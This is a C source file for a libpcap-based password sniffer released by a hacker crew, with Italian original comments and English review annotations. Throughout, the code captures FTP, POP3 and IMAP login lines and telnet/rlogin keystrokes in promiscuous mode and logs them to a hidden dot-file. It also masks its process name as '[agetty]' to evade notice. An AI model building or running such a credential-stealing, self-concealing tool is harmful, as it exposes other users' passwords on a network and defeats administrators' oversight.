
  1. /************************************************************************
  2. * Special Y2K Newbie Gift From S0ftProject Crew http://www.s0ftpj.org/    *
  3. * ---------------------------------------------------------------------    *
  4. * SPJY2Ksniff                                *
  5. *             Sniffer di rete per operare attacchi di tipo    *
  6. *            passivo ed evidenziare lacune nella protezione    *
  7. *            del proprio traffico di LAN. Fa uso della lib    *
  8. *            pcap(3) per accedere allo strato datalink.    *
  9. *            Questo vuol dire che la libreria deve essere    *
  10. *            presente, con i suoi header a disposizione del    *
  11. *            preprocessore.                    *
  12. *                                    *
  13. *            Compilate con:                    *
  14. *                 gcc -o SPJY2Ksniff SPJY2Ksniff.c -lpcap    *    
  15. *                                    *
  16. *                             FuSyS [S0ftPj|BFi]    *
  17. *                         http://www.s0ftpj.org/    *
  18. *                                    *
  19. ************************************************************************/
  20.  
  21. /*
  22.  * Cosa vuol dire Newbie Version ? Due cose:
  23.  * 1) questo sniffer lavora CON PRECISIONE solo su FTP, POP3 ed IMAP. Per altri
  24.  *    protocolli si basa sul conteggio dei byte inviati. Questo funziona bene
  25.  *    per Telnet e Rlogin, ma non e' altrettanto parsimonioso per i log.
  26.  * 2) usa gli include di Linux. Dovrete trovare voi il modo per usarlo su altri
  27.  *    UNIX. Ovviamente c'e' e NON e' difficile =;)
  28.  *
  29.  * NB: RICORDATEVI DI LIBPCAP !
  30.  *                            FuSyS
  31.  */
  32.  
  33. #include <netdb.h>
  34. #include <stdlib.h>
  35. #include <unistd.h>
  36. #include <stdio.h>
  37. #include <string.h>
  38. #include <ctype.h>
  39. #include <getopt.h>
  40. #include <netinet/in.h>
  41. #include <netinet/ip.h>
  42. #include <netinet/tcp.h>
  43. #include <net/if.h>
  44. #include <pcap/pcap.h>
  45. #include <signal.h>
  46.  
/* Link MTU; defined but not referenced anywhere in this file. */
#define         MTU                     1500
/* Bytes captured per frame (snaplen passed to pcap_open_live) and the size
 * of buff[].  Unparenthesised: safe for the uses in this file, but fragile. */
#define     SNAPLEN            8*1024
/* Number of slots in the theft[] flow table. */
#define        MAXCONN            10
/* Log file, opened for appending in the current directory by main(). */
#define         LOGFILE            ".NEWBIESNIFF"
/* Minimum (option-less) IPv4 and TCP header sizes. */
#define        IPHDR            sizeof(struct iphdr)
#define     TCPHDR            sizeof(struct tcphdr)

/* Shared packet state.
 * IFFHDR: link-layer header length chosen in main() from the datalink type.
 * i:      loop index shared by dumper() and sniff().
 * S:      slot index left behind by addc()/delc(); dumper() reads theft[S]
 *         right after addc() returns.
 * iplen/tcplen: header lengths derived from ihl/doff in nethunt(). */
int IFFHDR, i, S, iplen, tcplen;
struct pcap *pcap_s;                /* capture handle from pcap_open_live() */
struct pcap_pkthdr pcap_h;          /* header of the frame last returned by pcap_next() */
unsigned char *buf, *saddr, *daddr; /* buf: raw frame; saddr/daddr: byte views of the
                                     * IP addresses, set and read only by dumpip() */
struct iphdr *ip;                   /* IP header inside buf, set by nethunt() */
struct tcphdr *tcp;                 /* TCP header inside buf, set by nethunt() */
char *payload, buff[SNAPLEN];       /* payload: first byte after the TCP header;
                                     * buff: printable scratch copy written to the log */
FILE *logs;                         /* LOGFILE stream */
/* One tracked flow.  All fields are copied verbatim from the headers (no
 * byte-order conversion); addc()/delc() match on all four of
 * saddr/daddr/src/dst, so each direction of a TCP connection is a separate
 * entry.  unsigned long is wider than the 32-bit address field on LP64. */
struct conn {
        unsigned long saddr;
        unsigned long daddr;
        unsigned short src;
        unsigned short dst;
    unsigned long seq;              /* raw seq of the first packet seen; dumper() logs
                                     * only while the current seq is within 100 of it */
};
struct conn *theft[MAXCONN];        /* flow table; NULL means a free slot */
  70.  
/* Print the coloured banner and the usage line to stdout.
 * name is the program name shown in the usage line (argv[0] in main()). */
void uso(char *name)
{
    static const char *const banner[] = {
        "\n",
        "\033[1;32mSPJY2Ksniff",
        "\033[1;34m - Special Newbie Gift Version\n",
        "Y2K Gift From \033[1;32mS0ftProject \033[1;34mCrew",
        " - http://www.s0ftpj.org/\n",
        "Code by FuSyS [S0ftPj|BFi] <fusys@s0ftpj.org>\n\n",
    };

    for (size_t k = 0; k < sizeof banner / sizeof banner[0]; k++)
        fputs(banner[k], stdout);
    printf("Use: %s -i <device di rete>\033[0m\n\n", name);
}
  81.  
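/*
 * Signal handler installed by main() for SIGINT/SIGTERM/SIGQUIT: close the
 * capture handle and the log file, then exit with status 13.
 *
 * sig is the signal number that signal() always passes to the handler; the
 * old `void iffclose()` definition relied on an unprototyped parameter list
 * to be accepted as a handler.
 *
 * NOTE: pcap_close(), fclose() and exit() are not async-signal-safe, so this
 * can misbehave if the signal lands inside malloc() or stdio.  A volatile
 * sig_atomic_t flag polled by the capture loop is the robust alternative.
 */
void iffclose(int sig)
{
    (void)sig;
    pcap_close(pcap_s);
    fclose(logs);
    exit(13);
}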
  88.  
/*
 * Free every theft[] entry whose (saddr, daddr, source port, dest port)
 * equals the current packet's, and mark its slot NULL.  The whole table is
 * walked through the shared index S, which is MAXCONN on return.
 */
void delc()
{
    for (S = 0; S < MAXCONN; S++) {
        struct conn *c = theft[S];

        if (c == NULL)
            continue;
        if (c->saddr != ip->saddr || c->daddr != ip->daddr)
            continue;
        if (c->src != tcp->source || c->dst != tcp->dest)
            continue;

        free(c);
        theft[S] = NULL;
    }
}
  99.  
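/*
 * Look the current packet's flow up in theft[] and register it if unknown.
 *
 * Flows are keyed on (saddr, daddr, source port, dest port) exactly as they
 * appear in the headers, so each direction of a connection is its own entry.
 * On return S indexes the slot that was found or filled.  When the table is
 * full S == MAXCONN and no entry exists; when calloc() fails theft[S] is
 * NULL -- callers must check both before dereferencing theft[S] (the
 * original never checked calloc() and would dereference NULL).
 *
 * Returns 1 if the flow was already tracked, 0 otherwise (newly added, or
 * not added because the table is full or allocation failed).
 */
int addc()
{
    int empty = -1;

    /* One pass: look for a match and remember the first free slot. */
    for (S = 0; S < MAXCONN; S++) {
        struct conn *c = theft[S];

        if (c == NULL) {
            if (empty < 0)
                empty = S;
            continue;
        }
        if (c->saddr == ip->saddr && c->daddr == ip->daddr &&
            c->src == tcp->source && c->dst == tcp->dest)
            return 1;
    }

    if (empty < 0)
        return 0;               /* table full: S == MAXCONN */

    S = empty;
    struct conn *c = calloc(1, sizeof *c);
    if (c == NULL)
        return 0;               /* out of memory: slot stays NULL */

    c->saddr = ip->saddr;
    c->daddr = ip->daddr;
    c->src = tcp->source;
    c->dst = tcp->dest;
    c->seq = tcp->seq;          /* raw (network-order) seq of the first packet */
    theft[S] = c;
    return 0;
}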
  122.  
/*
 * Write the "-=[ a.b.c.d:port <-> a.b.c.d:port ]=-" banner for the current
 * packet to the log and flush it.  Addresses are printed byte by byte from
 * the raw header (network order is already dotted-quad order); ports go
 * through ntohs().  Also leaves the global saddr/daddr pointing at the
 * address fields, as before.
 */
void dumpip()
{
    const unsigned char *s = saddr = (unsigned char *)&ip->saddr;
    const unsigned char *d = daddr = (unsigned char *)&ip->daddr;
    int sport = ntohs(tcp->source);
    int dport = ntohs(tcp->dest);

    fprintf(logs, "\n-=[ %u.%u.%u.%u:%d <-> %u.%u.%u.%u:%d ]=-\n",
            s[0], s[1], s[2], s[3], sport,
            d[0], d[1], d[2], d[3], dport);
    fflush(logs);
}
  133.  
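/*
 * Byte-count heuristic used for telnet/rlogin: copy the current packet's TCP
 * payload into buff with non-printable bytes replaced ('\n' for CR/LF, '.'
 * otherwise), register the flow with addc(), and append buff to the log as
 * long as the packet's sequence number is within 100 of the first one seen
 * for that flow.  RST/FIN packets drop the flow instead.
 *
 * Fixes relative to the original: the payload length comes from
 * pcap_h.caplen (bytes actually captured) rather than pcap_h.len, and the
 * header sizes are subtracted in size_t so a short frame cannot wrap the
 * bound; the copy is clipped to sizeof(buff)-1; the CR/LF test looks at the
 * payload byte rather than the just-zeroed buff byte; isprint() is fed an
 * unsigned char; theft[S] is only dereferenced when addc() left a usable
 * slot (it sets S == MAXCONN when the table is full and leaves theft[S]
 * NULL when calloc() fails).
 */
void dumper()
{
    size_t hdrs = (size_t)IFFHDR + (size_t)iplen + (size_t)tcplen;
    size_t plen = pcap_h.caplen > hdrs ? pcap_h.caplen - hdrs : 0;

    if (plen > sizeof(buff) - 1)
        plen = sizeof(buff) - 1;

    memset(buff, 0, sizeof(buff));
    for (size_t k = 0; k < plen; k++) {
        unsigned char c = (unsigned char)payload[k];

        if (isprint(c))
            buff[k] = (char)c;
        else if (c == '\r' || c == '\n')
            buff[k] = '\n';
        else
            buff[k] = '.';
    }

    if (!addc())
        dumpip();

    if (!tcp->rst && !tcp->fin) {
        /* Unsigned difference: only the first ~100 bytes of a flow are logged. */
        if (S < MAXCONN && theft[S] != NULL &&
            ntohl(tcp->seq) - ntohl(theft[S]->seq) < 100)
            fprintf(logs, "%s", buff);
    } else {
        delc();
    }
    fflush(logs);
}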
  150.  
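/*
 * Bounded substring search.  The TCP payload is not NUL-terminated, so the
 * strstr() calls this replaces could read past the end of the captured
 * frame.  Returns 1 if needle occurs within the first n bytes of hay.
 */
static int payload_has(const char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);

    if (m == 0)
        return 1;
    for (size_t k = 0; k + m <= n; k++) {
        if (memcmp(hay + k, needle, m) == 0)
            return 1;
    }
    return 0;
}

/*
 * Copy at most `want` of the plen captured payload bytes into buff (always
 * NUL-terminated), write the flow banner, then the printable bytes of buff
 * up to the first CR/LF, and flush.  The original strncpy() did not
 * terminate buff, so strlen() ran on into bytes left by earlier packets.
 */
static void log_snippet(size_t plen, size_t want)
{
    size_t n = plen < want ? plen : want;

    if (n > sizeof(buff) - 1)
        n = sizeof(buff) - 1;
    memcpy(buff, payload, n);
    buff[n] = '\0';

    dumpip();
    for (size_t k = 0; buff[k] != '\0'; k++) {
        unsigned char c = (unsigned char)buff[k];

        if (isprint(c))
            fputc(c, logs);
        else if (c == '\r' || c == '\n')
            break;
    }
    fflush(logs);
}

/*
 * Dispatch the current packet on its destination port.  FTP (21) and POP3
 * (110): log up to 32 bytes of a packet carrying USER/PASS; IMAP (143, 220):
 * up to 80 bytes of a packet carrying AUTHENTICATE; telnet (23) and rlogin
 * (513): dumper()'s byte-count heuristic.  Every one of these protocols
 * carries credentials in cleartext, which is what the log makes visible.
 *
 * Frames whose captured length does not even cover the headers are dropped
 * here before any payload byte is touched.
 */
void sniff()
{
    size_t hdrs = (size_t)IFFHDR + (size_t)iplen + (size_t)tcplen;

    if (pcap_h.caplen < hdrs)
        return;
    size_t plen = pcap_h.caplen - hdrs;

    switch (ntohs(tcp->dest)) {
    case 21:
        if (payload_has(payload, plen, "USER") ||
            payload_has(payload, plen, "PASS"))
            log_snippet(plen, 32);
        break;
    /* tutto il resto, volendo */
    case 23:
    case 513:
        dumper();
        break;
    /* fine dumper polivalente */
    case 110:
        if (payload_has(payload, plen, "user") ||
            payload_has(payload, plen, "pass") ||
            payload_has(payload, plen, "USER") ||
            payload_has(payload, plen, "PASS"))
            log_snippet(plen, 32);
        break;
    case 143:
    case 220:
        if (payload_has(payload, plen, "authenticate") ||
            payload_has(payload, plen, "AUTHENTICATE"))
            log_snippet(plen, 80);
        break;
    default:
        break;
    }
}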
  205.  
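/*
 * Parse the IPv4 and TCP headers of the frame in buf and hand it to sniff().
 *
 * Sets the globals ip, iplen, tcp, tcplen and payload.  Each header is
 * checked against pcap_h.caplen (bytes actually captured) before it is read,
 * and ihl/doff are checked against their minimum values; non-IPv4, non-TCP,
 * non-first-fragment and truncated frames are dropped.  The original trusted
 * the IFFHDR+IPHDR check in main() alone and never validated ihl or doff, so
 * a short or truncated header was read past its end.
 *
 * NOTE(review): the casts assume the IP header is suitably aligned within
 * pcap's buffer -- confirm for every DLT main() accepts.
 */
void nethunt()
{
    size_t avail = pcap_h.caplen;
    size_t off = (size_t)IFFHDR;

    if (avail < off + IPHDR)
        return;
    ip = (struct iphdr *)(buf + off);
    if (ip->version != 4)
        return;
    iplen = ip->ihl << 2;
    if ((size_t)iplen < IPHDR || ip->protocol != IPPROTO_TCP)
        return;
    /* Non-first fragments carry no TCP header. */
    if ((ntohs(ip->frag_off) & IP_OFFMASK) != 0)
        return;
    off += (size_t)iplen;

    if (avail < off + TCPHDR)
        return;
    tcp = (struct tcphdr *)(buf + off);
    tcplen = tcp->doff << 2;
    if ((size_t)tcplen < TCPHDR)
        return;
    off += (size_t)tcplen;
    if (avail < off)
        return;

    payload = (char *)(buf + off);
    sniff();
}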
  216.  
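/*
 * Entry point.  Parses `-i <device>`, requires root, opens the device in
 * promiscuous mode through libpcap, picks the link-layer header length for
 * its datalink type, opens LOGFILE for appending, overwrites its own argv so
 * the command line reads "[agetty]", then hands every captured frame to
 * nethunt() until a signal ends the process through iffclose().
 *
 * Fixes relative to the original: the interface name is NUL-terminated and
 * over-long names are rejected (strncpy() into a 10-byte array was not);
 * a missing -i no longer leaves iff uninitialised; the argv clearing stops
 * at argc-1 (argv[2] was cleared even when argc == 2, i.e. a NULL pointer)
 * and the fake name is clipped to argv[0]'s original storage; the capture
 * loop checks caplen rather than the on-wire length; pcap's error text is
 * printed when the device cannot be opened.
 */
int main(int argc, char **argv)
{
    char iff[IFNAMSIZ] = "";
    char ebuf[PCAP_ERRBUF_SIZE] = "";
    const char *fakeargv = "[agetty]";
    int opt;

    if (argc < 2) {
        uso(argv[0]);
        exit(0);
    }

    /* Opening a capture device needs raw-socket privileges. */
    if (getuid()) {
        fprintf(stderr, "Spiacente, ma devi essere root\n");
        exit(1);
    }

    while ((opt = getopt(argc, argv, "i:")) != -1) {
        switch (opt) {
        case 'i': {
            int n = snprintf(iff, sizeof iff, "%s", optarg);

            if (n < 0 || (size_t)n >= sizeof iff) {
                uso(argv[0]);
                exit(1);
            }
            break;
        }
        default:
            exit(0);
        }
    }
    if (iff[0] == '\0') {
        uso(argv[0]);
        exit(0);
    }

    if ((pcap_s = pcap_open_live(iff, SNAPLEN, 1, 1000, ebuf)) == NULL) {
        fprintf(stderr, "Impossibile Aprire il Dispositivo Pcap\n");
        fprintf(stderr, "%s\n", ebuf);
        exit(17);
    }

    /* Bytes of link-layer framing in front of the IP header. */
    switch (pcap_datalink(pcap_s)) {
    case DLT_NULL:
    case DLT_PPP:
        IFFHDR = 4;
        break;
    case DLT_EN10MB:
    case DLT_EN3MB:
        IFFHDR = 14;
        break;
    case DLT_SLIP:
        IFFHDR = 16;
        break;
    case DLT_FDDI:
        IFFHDR = 21;
        break;
    case DLT_RAW:
        IFFHDR = 0;
        break;
    default:
        fprintf(stderr, "Dispositivo Sconosciuto !\n");
        exit(17);
    }

    if ((logs = fopen(LOGFILE, "a")) == NULL) {
        fprintf(stderr, "Impossibile Aprire il File di Log\n");
        exit(17);
    }

    /* SIGKILL cannot be caught; the original signal(SIGKILL, ...) only ever
     * returned SIG_ERR and is not repeated.
     * NOTE: iffclose() calls pcap_close/fclose/exit, none of which is
     * async-signal-safe; a volatile sig_atomic_t flag polled by the loop
     * below would be the robust pattern. */
    signal(SIGINT, iffclose);
    signal(SIGTERM, iffclose);
    signal(SIGQUIT, iffclose);

    printf("\n\033[1;32mSPJY2Ksniff\033[1;34m Newbie Gift Version from");
    printf("\033[1;32m S0ftProject Crew\n");
    printf("-----------------------------");
    printf("------------------------\033[0m\n");
    fflush(stdout);

    /* Rewrite the argument strings in place.  Only storage argv already
     * points at is written: the fake name is clipped to argv[0]'s length and
     * every argument up to argv[argc-1] is cleared. */
    size_t a0len = strlen(argv[0]);
    size_t flen = strlen(fakeargv);
    memset(argv[0], '\0', a0len + 1);
    memcpy(argv[0], fakeargv, flen < a0len ? flen : a0len);
    for (int k = 1; k < argc; k++)
        memset(argv[k], '\0', strlen(argv[k]) + 1);

    for (;;) {
        buf = (unsigned char *)pcap_next(pcap_s, &pcap_h);
        /* caplen is what was actually captured; len is the on-wire size. */
        if (buf != NULL && pcap_h.caplen >= (size_t)IFFHDR + IPHDR)
            nethunt();
    }
    return 0;   /* not reached: the loop is left through iffclose() */
}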